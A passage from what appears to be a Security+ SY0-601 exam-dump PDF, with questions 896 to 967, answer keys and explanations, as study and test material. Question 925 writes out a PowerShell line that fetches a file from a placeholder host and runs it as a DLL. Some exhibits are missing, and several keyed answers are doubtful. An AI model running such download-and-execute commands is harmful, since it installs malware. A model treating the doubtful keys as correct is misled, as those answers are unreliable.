including the firmware all the way to the boot drivers and it will store this information in what is
called a Trusted Platform Module (TPM).
QUESTION 896
An organization wants to enable built-in FDE on all laptops. Which of the following should the
organization ensure is installed on all laptops?
A.
B.
C.
D.
TPM
CA
SAML
CRL
Answer: A
Explanation:
The organization should ensure that a Trusted Platform Module (TPM) is installed on all laptops
inorder to enable built-in Full Disk Encryption (FDE). TPM is a hardware-based security chip that
storesencryption keys and helps to protect data from malicious attacks. It is important to ensure
that theTPM is properly configured and enabled in order to get the most out of FDE.
QUESTION 897
A security analyst needs to centrally manage credentials and permissions to the company's
network devices. The following security requirements must be met:
- All actions performed by the network staff must be logged.
- Per-command permissions must be possible.
- The authentication server and the devices must communicate through
TCP.
Which of the following authentication protocols should the analyst choose?
A.
B.
C.
D.
Kerberos
CHAP
TACACS+
RADIUS
Answer: C
Explanation:
TACACS+ (Terminal Access Controller Access Control System Plus) is an authentication protocol
that meets the security requirements specified.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
314
QUESTION 898
An organization recently released a software assurance policy that requires developers to run
code scans each night on the repository. After the first night, the security team alerted the
developers that more than 2,000 findings were reported and need to be addressed. Which of the
following is the MOST likely cause for the high number of findings?
A.
B.
C.
D.
The vulnerability scanner was not properly configured and generated a high number of false positives.
Third-party libraries have been loaded into the repository and should be removed from the codebase.
The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue
The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.
Answer: A
QUESTION 899
A major manufacturing company updated its internal infrastructure and just recently started to
allow OAuth applications to access corporate data. Data leakage is now being reported. Which of
the following MOST likely caused the issue?
A.
B.
C.
D.
Privilege creep
Unmodified default settings
TLS protocol vulnerabilities
Improper patch management
Answer: B
QUESTION 900
An organization is moving away from the use of client-side and server-side certificates for EAP.
The company would like for the new EAP solution to have the ability to detect rogue access
points. Which of the following would accomplish these requirements?
A.
B.
C.
D.
PEAP
EAP-FAST
EAP-TLS
EAP-TTLS
Answer: B
Explanation:
EAP-FAST authenticates by means of a PAC (Protected Access Credential) which can be
managed dynamically by the authentication server.
EAP-TLS, EAP-TTLS, PEAP are cert based. The question states the company is moving away
from client and server side certificates.
QUESTION 901
A security team is engaging a third-party vendor to do a penetration test of a new proprietary
application prior to its release. Which of the following documents would the third-party vendor
MOST likely be required to review and sign?
A. SLA
B. NDA
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
315
C. MOU
D. AUP
Answer: B
Explanation:
The third-party vendor would most likely be required to review and sign a non-disclosure
agreement (NDA) or confidentiality agreement. This document outlines the terms and conditions
of the engagement, including the requirement for the vendor to keep all information about the
proprietary application confidential and not to disclose any information about the test results or
findings to any third parties.
QUESTION 902
During a Chief Information Security Officer (CISO) convention to discuss security awareness, the
attendees are provided with a network connection to use as a resource. As the convention
progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site
requests are reverting to HTTP. Which of the following BEST describes what is happening?
A.
B.
C.
D.
Birthday collision on the certificate key
DNS hijacking to reroute traffic
Brute force to the access point
A SSL/TLS downgrade
Answer: D
QUESTION 903
Audit logs indicate an administrative account that belongs to a security engineer has been locked
out multiple times during the day. The security engineer has been on vacation for a few days.
Which of the following attacks can the account lockout be attributed to?
A.
B.
C.
D.
Backdoor
Brute-force
Rootkit
Trojan
Answer: B
QUESTION 904
After installing a patch on a security appliance, an organization realized a massive data
exfiltration had occurred. Which of the following BEST describes the incident?
A.
B.
C.
D.
Supply chain attack
Ransomware attack
Cryptographic attack
Password attack
Answer: A
QUESTION 905
Physical access to the organization's servers in the data center requires entry and exit through
multiple access points: a lobby, an access control vestibule, three doors leading to the server
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
316
floor, a door to the server floor itself, and eventually to a caged area solely for the organization's
hardware. Which of the following controls is described in this scenario?
A.
B.
C.
D.
Compensating
Deterrent
Preventive
Detective
Answer: C
QUESTION 906
A company is switching to a remote work model for all employees. All company and employee
resources will be in the cloud. Employees must use their personal computers to access the cloud
computing environment. The company will manage the operating system. Which of the following
deployment models is the company implementing?
A.
B.
C.
D.
CYOD
MDM
COPE
VDI
Answer: D
QUESTION 907
A security administrator needs to inspect in-transit files on the enterprise network to search for
PII, credit card data, and classification words. Which of the following would be the BEST to use?
A.
B.
C.
D.
IDS solution
EDR solution
HIPS software solution
Network DLP solution
Answer: D
QUESTION 908
The Chief Executive Officer announced a new partnership with a strategic vendor and asked the
Chief Information Security Officer to federate user digital identities using SAML-based protocols.
Which of the following will this enable?
A.
B.
C.
D.
SSO
MFA
PKI
DLP
Answer: A
Explanation:
The implementation of SAML-based protocols will enable Single Sign-On (SSO).
QUESTION 909
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
317
An employee's company account was used in a data breach. Interviews with the employee
revealed:
- The employee was able to avoid changing passwords by using a previous
password again.
- The account was accessed from a hostile, foreign nation, but the
employee has never traveled to any other countries.
Which of the following can be implemented to prevent these issues from reoccurring? (Choose
two.)
A.
B.
C.
D.
E.
F.
Geographic dispersal
Password complexity
Password history
Geotagging
Password lockout
Geofencing
Answer: CF
Explanation:
C - User bypassed changing passwords by using a previously used pwd.
F - User has never travelled to another country, so geofencing will limit access to current location.
QUESTION 910
A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The
malicious website looks exactly like the legitimate website. Which of the following BEST
describes this type of attack?
A.
B.
C.
D.
Reconnaissance
Impersonation
Typosquatting
Watering-hole
Answer: C
Explanation:
Typosquatting is a type of cyber attack where an attacker creates a domain name that is similar
to a legitimate domain name, but with a slight variation, such as a misspelling, in order to trick
users into visiting the malicious site. In this case, the malicious site "comptiia.org" is designed to
look like the legitimate site "comptia.org", in an attempt to steal sensitive information or perform
other malicious activities.
QUESTION 911
The marketing department at a retail company wants to publish an internal website to the internet
so it is reachable by a limited number of specific, external service providers in a secure manner.
Which of the following configurations would be BEST to fulfil this requirement?
A.
B.
C.
D.
NAC
ACL
WAF
NAT
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
318
Explanation:
Network access for non-employees (vendors or partners): NAC with VPN allows external users to
access the corporate network (or specific parts of it) through a secure self-service portal.
QUESTION 912
A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and
operated by an outdated and unsupported specialized Windows OS. Which of the following is
MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?
A.
B.
C.
D.
The time needed for the MRI vendor to upgrade the system would negatively impact patients.
The MRI vendor does not support newer versions of the OS.
Changing the OS breaches a support SLA with the MRI vendor.
The IT team does not have the budget required to upgrade the MRI scanner.
Answer: B
Explanation:
It's a specialized version of the OS, so the vendor dropped the support.
QUESTION 913
A company received a "right to be forgotten" request. To legally comply, the company must
remove data related to the requester from its systems. Which of the following is the company
MOST likely complying with?
A.
B.
C.
D.
NIST CSF
GDPR
PCI DSS
ISO 27001
Answer: B
Explanation:
The General Data Protection Regulation (GDPR) governs how personal data must be collected,
processed, and erased. The "right to be forgotten," which received a lot of press after the 2014
judgment from the EU Court of Justice, set the precedent for the right of erasure provision
contained in the GDPR.
QUESTION 914
A security administrator is evaluating remote access solutions for employees who are
geographically dispersed. Which of the following would provide the MOST secure remote
access? (Choose two.)
A.
B.
C.
D.
E.
F.
IPSec
SFTP
SRTP
LDAPS
S/MIME
SSL VPN
Answer: AF
QUESTION 915
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
319
A company is looking to migrate some servers to the cloud to minimize its technology footprint.
The company has a customer relationship management system on premises. Which of the
following solutions will require the LEAST infrastructure and application support from the
company?
A.
B.
C.
D.
SaaS
IaaS
PaaS
SDN
Answer: A
QUESTION 916
A network administrator needs to determine the sequence of a server farm's logs. Which of the
following should the administrator consider? (Choose two.)
A.
B.
C.
D.
E.
F.
Chain of custody
Tags
Reports
Time stamps
Hash values
Time offset
Answer: DF
Explanation:
Time stamps and the time offset (think time zones) will definitely impact the order in which they
are displayed.
QUESTION 917
A security administrator, who is working for a government organization, would like to utilize
classification and granular planning to secure top secret data and grant access on a need-toknow basis. Which of the following access control schemas should the administrator consider?
A.
B.
C.
D.
Mandatory
Rule-based
Discretionary
Role-based
Answer: A
Explanation:
In a MAC system, an operating system provides individual users with access based on data
confidentiality and levels of user clearance.
MAC is the strictest of all models. Access is granted on a strict, need-to-know basis. Users must
prove they need the requested information or access before gaining permission.
QUESTION 918
An organization is outlining data stewardship roles and responsibilities. Which of the following
employee roles would determine the purpose of data and how to process it?
A. Data custodian
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
320
B. Data controller
C. Data protection officer
D. Data processor
Answer: B
Explanation:
The entities who determine the reasons for processing personal information and direct the
methods of processing that data. This term is used primarily in European law and it serves as a
substitute for the term data owner to avoid a presumption that anyone who collects data has an
ownership interest in that data.
QUESTION 919
Multiple beaconing activities to a malicious domain have been observed. The malicious domain is
hosting malware from various endpoints on the network. Which of the following technologies
would be BEST to correlate the activities between the different endpoints?
A.
B.
C.
D.
Firewall
SIEM
IPS
Protocol analyzer
Answer: B
QUESTION 920
Users report access to an application from an internal workstation is still unavailable to a specific
server, even after a recent firewall rule implementation that was requested for this access. ICMP
traffic is successful between the two devices. Which of the following tools should the security
analyst use to help identify if the traffic is being blocked?
A.
B.
C.
D.
nmap
tracert
ping
ssh
Answer: A
Explanation:
Nmap help identify if traffic is being blocked between two devices.
QUESTION 921
As part of annual audit requirements, the security team performed a review of exceptions to the
company policy that allows specific users the ability to use USB storage devices on their laptops.
The review yielded the following results:
- The exception process and policy have been correctly followed by the
majority of users.
- A small number of users did not create tickets for the requests but
were granted access.
- All access had been approved by supervisors.
- Valid requests for the access sporadically occurred across multiple
departments.
- Access, in most cases, had not been removed when it was no longer
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
321
needed.
Which of the following should the company do to ensure that appropriate access is not disrupted
but unneeded access is removed in a reasonable time frame?
A.
B.
C.
D.
Create an automated, monthly attestation process that removes access if an employee's supervisor denies the app
Remove access for all employees and only allow new access to be granted if the employee's supervisor approves
Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the ma
Implement a ticketing system that tracks each request and generates reports listing which employees actively use
Answer: C
QUESTION 922
A cryptomining company recently deployed a new antivirus application to all of its mining
systems. The installation of the antivirus application was tested on many personal devices, and
no issues were observed. Once the antivirus application was rolled out to the servers, constant
issues were reported. As a result, the company decided to remove the mining software. The
antivirus application was MOST likely classifying the software as:
A.
B.
C.
D.
E.
a rootkit.
a PUP.
a backdoor.
ransomware.
a RAT.
Answer: B
Explanation:
The mining software was MOST likely being classified by the antivirus application as a Potentially
Unwanted Program (PUP).
QUESTION 923
A company recently implemented a patch management policy; however, vulnerability scanners
have still been flagging several hosts, even after the completion of the patch process. Which of
the following is the MOST likely cause of the issue?
A.
B.
C.
D.
The vendor firmware lacks support.
Zero-day vulnerabilities are being discovered.
Third-party applications are not being patched.
Code development is being outsourced.
Answer: C
Explanation:
It's not zero day.
It's extremely unlikely a vulnerability scanner would discover a zero day vulnerability bcs nobody
knows it exists.
QUESTION 924
A penetration tester executes the command crontab -l while working in a Linux server
environment. The penetration tester observes the following string in the current user's list of cron
jobs:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
322
*/10 * * * * root /writable/update.sh
Which of the following actions should the penetration tester perform NEXT?
A.
B.
C.
D.
Privilege escalation
Memory leak
Directory traversal
Race condition
Answer: A
Explanation:
The penetration tester has discovered a cron job that runs every 10 minutes as the root user and
executes the script /writable/update.sh. This suggests that the update.sh script has write
permissions in a directory that is writable by the current user.
Therefore, the next logical step for the penetration tester would be to review the contents of the
/writable directory and the update.sh script to determine if there are any vulnerabilities that can be
exploited to escalate privileges or otherwise compromise the system.
QUESTION 925
An employee received an email with an unusual file attachment named Updates.lnk. A security
analyst is reverse engineering what the file does and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI
https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process
rundl132.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
A.
B.
C.
D.
A PowerShell code is performing a DLL injection.
A PowerShell code is displaying a picture.
A PowerShell code is configuring environmental variables.
A PowerShell code is changing Windows Update settings.
Answer: A
Explanation:
Remote server using PowerShell and saving it as "autoupdate.dll" in the user's temporary folder.
It then executes the file using the "rundll32.exe" program, which suggests that the file is being
used to perform some sort of malicious activity.
QUESTION 926
Which of the following BEST describes the team that acts as a referee during a penetrationtesting exercise?
A.
B.
C.
D.
E.
White team
Purple team
Green team
Blue team
Red team
Answer: A
Explanation:
A white-team is typically defined as the referees in a penetration test or security assessment
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
323
exercise. They establish the RoE, other guidelines, and boundaries of the security evalu-ation.
They oversee the event and ensure that both sides of the simulated conflict/breach/intrusion are
operating by the rules. They also facilitate communication between the blue-team and red-team.
QUESTION 927
A security administrator is seeking a solution to prevent unauthorized access to the internal
network. Which of the following security solutions should the administrator choose?
A.
B.
C.
D.
MAC filtering
Anti-malware
Translation gateway
VPN
Answer: A
Explanation:
MAC filtering is a security method based on access control. In this, each address is assigned a
48-bit address which is used to determine whether we can access a network or not.
QUESTION 928
A security administrator is working on a solution to protect passwords stored in a database
against rainbow table attacks. Which of the following should the administrator consider?
A.
B.
C.
D.
Hashing
Salting
Lightweight cryptography
Steganography
Answer: B
QUESTION 929
A company is launching a website in a different country in order to capture user information that a
marketing business can use. The company itself will not be using the information. Which of the
following roles is the company assuming?
A.
B.
C.
D.
Data owner
Data processor
Data steward
Data collector
Answer: C
Explanation:
Data steward - this role is primarily responsible for data quality. This involves tasks such as
ensuring data is labeled and identified with appropriate metadata and that data is collected and
stored in a format and with values that comply with applicable laws and regulations.
QUESTION 930
An employee used a corporate mobile device during a vacation. Multiple contacts were modified
in the device during the employee's vacation. Which of the following attack methods did an
attacker use to insert the contacts without having physical access to the device?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
324
A.
B.
C.
D.
Jamming
Bluejacking
Disassociation
Evil twin
Answer: B
QUESTION 931
A security analyst is reviewing packet capture data from a compromised host on the network. In
the packet capture, the analyst locates packets that contain large amounts of text. Which of the
following is most likely installed on the compromised host?
A.
B.
C.
D.
Keylogger
Spyware
Trojan
Ransomware
Answer: A
Explanation:
A keylogger is a type of malware that records keystrokes made on a computer keyboard. This
would allow an attacker to capture any text entered by the user, which could be included in the
captured packets.
QUESTION 932
A security analyst reviews web server logs and notices the following line:
Which of the following vulnerabilities is the attacker trying to exploit?
A.
B.
C.
D.
SSRF
CSRF
XSS
SQLi
Answer: D
QUESTION 933
A user is having network connectivity issues when working from a coffee shop. The user has
used the coffee shop as a workspace for several months without any issues. None of the other
customers at the coffee shop are experiencing these issues. A help desk analyst at the user's
company reviews the following Wi-Fi log:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
325
Which of the following best describes what is causing this issue?
A.
B.
C.
D.
Another customer has configured a rogue access point.
The coffee shop network is using multiple frequencies.
A denial-of-service attack by disassociation is occurring.
An evil twin access point is being utilized.
Answer: C
QUESTION 934
Which of the following is a physical security control that ensures only the authorized user is
present when gaining access to a secured area?
A.
B.
C.
D.
A biometric scanner
A smart card reader
A PKI token
A PIN pad
Answer: A
QUESTION 935
A company is moving to new location. The systems administrator has provided the following
server room requirements to the facilities staff:
- Consistent power levels in case of brownouts or voltage spikes
- A minimum of 30 minutes runtime following a power outage
- Ability to trigger graceful shutdowns of critical systems
Which of the following would BEST meet the requirements?
A.
B.
C.
D.
Maintaining a standby, gas-powered generator
Using large surge suppressors on computer equipment
Configuring managed PDUs to monitor power levels
Deploying an appropriately sized, network-connected UPS device
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
326
Answer: D
Explanation:
An uninterruptible power supply (UPS) uses a small battery (often the same type used in
motorcycles) as a backup power source if the power ever sags or goes out completely. It's very
common to place a UPS at the bottom of an equipment rack, powering all the devices on the rack
with quality, dependable power. A UPS is designed to power a system for a few minutes to
enable an orderly shutdown.
QUESTION 936
Which of the following would provide guidelines on how to label new network devices as part of
the initial configuration?
A.
B.
C.
D.
IP schema
Application baseline configuration
Standard naming convention policy
Wireless LAN and network perimeter diagram
Answer: C
Explanation:
Standard naming convention policy would provide guidelines on how to label new network
devices as part of the initial configuration. A standard naming convention policy establishes a
consistent method for naming and labeling IT assets, such as network devices, in order to ensure
clear and unambiguous identification.
QUESTION 937
A systems engineer thinks a business system has been compromised and is being used to
exfiltrate data to a competitor. The engineer contacts the CSIRT. The CSIRT tells the engineer to
immediately disconnect the network cable and to not do anything else. Which of the following is
the most likely reason for this request?
A.
B.
C.
D.
The CSIRT thinks an insider threat is attacking the network.
Outages of business-critical systems cost too much money.
The CSIRT does not consider the systems engineer to be trustworthy.
Memory contents, including fileless malware, are lost when the power is turned off.
Answer: A
QUESTION 938
Which of the following best describes the situation where a successfully onboarded employee
who is using a fingerprint reader is denied access at the company's main gate?
A.
B.
C.
D.
Crossover error rate
False match rate
False rejection
False positive
Answer: C
QUESTION 939
Which of the following should customers who are involved with UI developer agreements be
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
327
concerned with when considering the use of these products on highly sensitive projects?
A.
B.
C.
D.
Weak configurations
Integration activities
Unsecure user accounts
Outsourced code development
Answer: D
Explanation:
Outsourced code development. Outsourced code development can introduce risks to the security
and confidentiality of the project if not properly managed and monitored.
QUESTION 940
A police department is using the cloud to share information with city officials. Which of the
following cloud models describes this scenario?
A.
B.
C.
D.
Hybrid
Private
Public
Community
Answer: D
Explanation:
The cloud model that describes the scenario where a police department is using the cloud to
share information with city officials is the Community Cloud model.
The Community Cloud model is a cloud infrastructure that is shared among organizations with
similar interests, concerns or mission. In this model, the cloud infrastructure is used by a group of
organizations to share information, resources, and services to achieve common goals.
QUESTION 941
A user reports that a bank's website no longer displays a padlock symbol. A security analyst
views the user's screen and notices the connection is using HTTP instead of HTTPS. Which of
the following attacks is most likely occurring?
A.
B.
C.
D.
Memory leak
SSL stripping
API
Pass the hash
Answer: B
Explanation:
SSL stripping is a type of man-in-the-middle (MitM) attack where the attacker intercepts the
communication between the client and the server, and downgrades the secure HTTPS
connection to an insecure HTTP connection. The attacker then impersonates the server and
continues the communication with the client over the unencrypted HTTP connection.
QUESTION 942
A data center has experienced an increase in under-voltage events following electrical grid
maintenance outside the facility. These events are leading to occasional losses of system
availability. Which of the following would be the most cost-effective solution for the data center to
implement?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
328
A.
B.
C.
D.
Uninterruptible power supplies with battery backup
Managed power distribution units to track these events
A generator to ensure consistent, normalized power delivery
Dual power supplies to distribute the load more evenly
Answer: A
QUESTION 943
A security architect is designing a remote access solution for a business partner. The business
partner needs to access one Linux server at the company. The business partner wants to avoid
managing a password for authentication and additional software installation. Which of the
following should the architect recommend?
A.
B.
C.
D.
Soft token
Smart card
CSR
SSH key
Answer: D
Explanation:
The security architect should recommend using SSH key authentication for the remote access
solution.
QUESTION 944
A security analyst is assisting a team of developers with best practices for coding. The security
analyst would like to defend against the use of SQL injection attacks. Which of the following
should the security analyst recommend first?
A.
B.
C.
D.
Tokenization
Input validation
Code signing
Secure cookies
Answer: B
QUESTION 945
Cloud security engineers are planning to allow and deny access to specific features in order to
increase data security. Which of the following cloud features is the most appropriate to ensure
access is granted properly?
A.
B.
C.
D.
API integrations
Auditing
Resource policies
Virtual networks
Answer: C
QUESTION 946
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
329
A security operations technician is searching the log named /var/messages for any events that
were associated with a workstation with the IP address 10.1.1.1. Which of the following would
provide this information?
A.
B.
C.
D.
cat /var/messages | grep 10.1.1.1
grep 10.1.1.1 | cat /var/messages
grep /var/messages | cat 10.1.1.1
cat 10.1.1.1 | grep /var/messages
Answer: A
QUESTION 947
A security analyst is investigating a report from a penetration test. During the penetration test,
consultants were able to download sensitive data from a back-end server. The back-end server
was exposing an API that should have only been available from the company's mobile
application. After reviewing the back-end server logs, the security analyst finds the following
entries:
Which of the following is the most likely cause of the security control bypass?
A.
B.
C.
D.
IP address allow list
User-agent spoofing
WAF bypass
Referrer manipulation
Answer: B
Explanation:
User-agent spoofing is a technique used by attackers to impersonate a legitimate user agent or
mobile application to bypass security controls. In this case, the back-end server was exposing an
API that should have only been available from the company's mobile application. By spoofing the
user agent, the attacker was able to trick the back-end server into believing that the API request
was coming from the legitimate mobile application, and therefore, was able to bypass the security
control that was supposed to restrict access to the API to only the mobile application.
QUESTION 948
Which of the following processes would most likely help an organization that has conducted an
incident response exercise to improve performance and identify challenges?
A.
B.
C.
D.
Lessons learned
Identification
Simulation
Containment
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
330
Answer: A
Explanation:
The process that would most likely help an organization that has conducted an incident response
exercise to improve performance and identify challenges is lessons learned.
Lessons learned is a process that involves analyzing an incident, reviewing what went well,
identifying challenges, and making recommendations for improvement. By conducting a lessons
learned process after an incident response exercise, an organization can identify areas where it
needs to improve and take steps to address these areas. The lessons learned process can also
help organizations identify best practices and strategies that were successful during the exercise.
QUESTION 949
Which of the following control types is patch management classified under?
A.
B.
C.
D.
Deterrent
Physical
Corrective
Detective
Answer: C
Explanation:
Corrective controls are designed to address an issue or vulnerability that has already been
identified. Patch management is the process of applying updates or patches to software systems
to address vulnerabilities or bugs that have been identified.
QUESTION 950
A security analyst is investigating what appears to be unauthorized access to a corporate web
application. The security analyst reviews the web server logs and finds the flowing entries:
Which of the following password attacks is taking place?
A.
B.
C.
D.
Dictionary
Brute-force
Rainbow table
Spraying
Answer: B
Explanation:
In a brute-force attack, an attacker tries every possible combination of characters until the correct
password is found. Incrementing on a PIN will do just that.
QUESTION 951
A company that provides an online streaming service made its customers' personal data,
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
331
including names and email addresses, publicly available in a cloud storage service. As a result,
the company experienced an increase in the number of requests to delete user accounts. Which
of the following BEST describes the consequence of this data disclosure?
A.
B.
C.
D.
Regulatory fines
Reputation damage
Increased insurance costs
Financial loss
Answer: B
QUESTION 952
Which of the following can be used to detect a hacker who is stealing company data over port
80?
A.
B.
C.
D.
Web application scan
Threat intelligence
Log aggregation
Packet capture
Answer: D
Explanation:
Packet capture involves capturing and analyzing network traffic to identify malicious activity. By
capturing packets sent and received over port 80, which is commonly used for HTTP traffic, it is
possible to identify any suspicious activity that could indicate a hacker stealing company data.
QUESTION 953
A company recently enhanced mobile device configuration by implementing a set of security
controls biometrics context-aware authentication and full device encryption. Even with these
settings in place, an unattended phone was used by a malicious actor to access corporate data.
Which of the following additional controls should be put in place first?
A.
B.
C.
D.
GPS tagging
Remote wipe
Screen lock timer
SEAndroid
Answer: B
Explanation:
Remote wipe allows an authorized user to remotely erase all data from a lost or stolen mobile
device, thereby preventing unauthorized access to corporate data. Even with security controls
such as biometrics, context-aware authentication, and full device encryption in place, a lost or
stolen device can be a significant risk if it contains sensitive corporate data. Therefore, remote
wipe is a critical control to have in place to mitigate the risk of data breaches resulting from lost or
stolen devices.
QUESTION 954
An organization wants to quickly assess how effectively the IT team hardened new laptops.
Which of the following would be the best solution to perform this assessment?
A. Install a SIEM tool and properly configure it to read the OS configuration files
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
332
B. Load current baselines into the existing vulnerability scanner
C. Maintain a risk register with each security control marked as compliant or non-compliant
D. Manually review the secure configuration guide checklists
Answer: D
Explanation:
Manually review the secure configuration guide checklists would be the best solution to quickly
assess how effectively the IT team hardened new laptops.
QUESTION 955
A user is trying to upload a tax document which the corporate finance department requested but a
security program is prohibiting the upload. A security analyst determines the file contains PII.
Which of the following steps can the analyst take to correct this issue?
A.
B.
C.
D.
Create a URL filter with an exception for the destination website
Add a firewall rule to the outbound proxy to allow file uploads
Issue a new device certificate to the user's workstation
Modify the exception list on the DLP to allow the upload
Answer: D
Explanation:
The security program is blocking the upload because it has identified PII in the file. This indicates
that the organization has a Data Loss Prevention (DLP) program in place that is configured to
prevent the unauthorized transfer of sensitive data.
QUESTION 956
A cybersecurity analyst at Company A is working to establish a secure communication channel
with a counterpart at Company B, which is 3,000 miles (4,828 kilometers) away. Which of the
following concepts would help the analyst meet this goal in a secure manner?
A.
B.
C.
D.
Digital signatures
Key exchange
Salting
PPTP
Answer: B
Explanation:
Key exchange is a concept in cryptography that involves the secure exchange of cryptographic
keys between two parties to establish a secure communication channel. This process involves
using a secure algorithm to exchange keys without exposing them to eavesdropping or
interception.
QUESTION 957
A security analyst is reviewing computer logs because a host was compromised by malware.
After the computer was infected it displayed an error screen and shut down. Which of the
following should the analyst review first to determine more information?
A. Dump file
B. System log
C. Web application log
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
333
D. Security log
Answer: B
Explanation:
System logs are files that contain records of events that have occurred on the computer's
operating system. They can provide valuable information about what actions were taken on the
computer leading up to the error screen and shutdown, which can help the analyst identify the
cause of the compromise.
QUESTION 958
A security architect is working on an email solution that will send sensitive data. However, funds
are not currently available in the budget for building additional infrastructure. Which of the
following should the architect choose?
A.
B.
C.
D.
POP
IPSec
IMAP
PGP
Answer: D
Explanation:
Out of the given options, the security architect should choose PGP (Pretty Good Privacy) to send
sensitive data via email. PGP is a widely-used encryption standard that can be implemented on
the existing email infrastructure without the need for additional infrastructure.
QUESTION 959
A user reset the password for a laptop but has been unable to log in to it since then. In addition,
several unauthorized emails were sent on the user’s behalf recently. The security team
investigates the issue and identifies the following findings:
- Firewall logs show excessive traffic from the laptop to an external
site.
- Unknown processes were running on the laptop.
- RDP connections that appeared to be authorized were made to other
network devices from the laptop.
- High bandwidth utilization alerts from that user's username.
Which of the following is most likely installed on the laptop?
A.
B.
C.
D.
Worm
Keylogger
Trojan
Logic bomb
Answer: C
QUESTION 960
A systems administrator is required to enforce MFA for corporate email account access, relying
on the possession factor. Which of the following authentication methods should the systems
administrator choose? (Choose two.)
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
334
A.
B.
C.
D.
E.
F.
Passphrase
Time-based one-time password
Facial recognition
Retina scan
Hardware token
Fingerprints
Answer: BE
QUESTION 961
Which of the following biometric authentication methods is the most accurate?
A.
B.
C.
D.
Gait
Retina
Signature
Voice
Answer: B
Explanation:
Retina scanning involves shining a low-intensity light into a person's eye and measuring the
unique pattern of the blood vessels in the retina at the back of the eye. The retina pattern is
unique for each individual and is nearly impossible to replicate, making it an extremely accurate
biometric authentication method.
QUESTION 962
A security team will be outsourcing several key functions to a third party and will require that:
- Several of the functions will carry an audit burden
- Attestations will be performed several times a year
- Reports will be generated on a monthly basis
Which of the following best describes the document that is used to define these requirements and
stipulate how and when they are performed by the third party?
A.
B.
C.
D.
MOU
AUP
SLA
MSA
Answer: C
Explanation:
An SLA is a contractual document that defines the level of service that the provider will deliver to
the customer, including details such as service availability, performance metrics, and how
disputes will be resolved. It also outlines the responsibilities and obligations of both parties.
QUESTION 963
A small, local company experienced a ransomware attack. The company has one web-facing
server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is
set up on the router to forward all polls so that the server is viewable from the internet. The
company uses an older version of third-party software to manage the website. The assets were
never patched. Which of the following should be done to prevent an attack like this from
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
335
happening again? (Choose three.)
A.
B.
C.
D.
E.
F.
G.
H.
install DLP software to prevent data loss
Use the latest version of software
Install a SIEM device
Implement MDM
Implement a screened subnet for the web server
Install an endpoint security solution
Update the website certificate and revoke the existing ones
Deploy additional network sensors
Answer: BEF
QUESTION 964
A security investigation revealed that malicious software was installed on a server using a server
administrator's credentials. During the investigation, the server administrator explained that
Telnet was regularly used to log in. Which of the following most likely occurred?
A.
B.
C.
D.
A spraying attack was used to determine which credentials to use
A packet capture tool was used to steal the password
A remote-access Trojan was used to install the malware
A dictionary attack was used to log in as the server administrator
Answer: B
Explanation:
The use of Telnet by the server administrator suggests that the credentials were transmitted in
cleartext, which means that they could have been intercepted by an attacker who was monitoring
the network traffic.
QUESTION 965
Stakeholders at an organization must be kept aware of any incidents and receive updates on
status changes as they occur. Which of the following plans would fulfill this requirement?
A.
B.
C.
D.
Communication plan
Disaster recovery plan
Business continuity plan
Risk plan
Answer: A
Explanation:
A communication plan is a crucial component of any incident management plan. It outlines how
stakeholders will be kept informed about the incident, including what information will be
communicated, who will communicate it, and how frequently updates will be provided. The plan
also defines the methods and channels of communication, such as email, phone, or social media,
and identifies the target audiences for each type of communication.
QUESTION 966
An employee who is using a mobile device for work, is required to use a fingerprint to unlock the
device. Which of the following is this an example of?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
336
A.
B.
C.
D.
Something you know
Something you are
Something you have
Somewhere you are
Answer: B
Explanation:
This is an example of biometric authentication, which is a type of authentication that uses an
individual's physical or behavioral characteristics to verify their identity. In this case, the user's
fingerprint is a unique physical characteristic that is used to authenticate their identity and unlock
the mobile device.
QUESTION 967
Which of the following security controls can be used to prevent multiple people from using a
unique card swipe and being admitted to a secure entrance?
A.
B.
C.
D.
Visitor logs
Faraday cages
Access control vestibules
Motion detection sensors
Answer: C
Explanation:
Access control vestibules, also known as mantraps, are designed to prevent unauthorized
